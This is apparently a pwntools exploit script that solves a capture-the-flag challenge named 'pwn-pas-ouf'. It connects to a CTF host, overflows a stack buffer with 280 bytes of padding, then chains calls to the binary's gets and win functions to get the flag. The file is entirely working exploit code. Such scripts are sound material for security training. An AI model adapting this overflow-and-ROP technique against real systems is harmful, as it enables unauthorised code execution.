#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./pwn-pas-ouf", checksec=False)
# r = process()
r = process("openssl s_client -quiet -verify_quiet -connect main-5000-pwn-pas-ouf-70df26172a24b94f.ctf.4ts.fr:52525", shell=True)

# funcs
s = lambda a: r.sendline(a)

# buf
buf = b"A"*280
buf += p64(target.sym.gets)
buf += p64(target.sym.win)
s(buf)
s(b"flag")

r.interactive()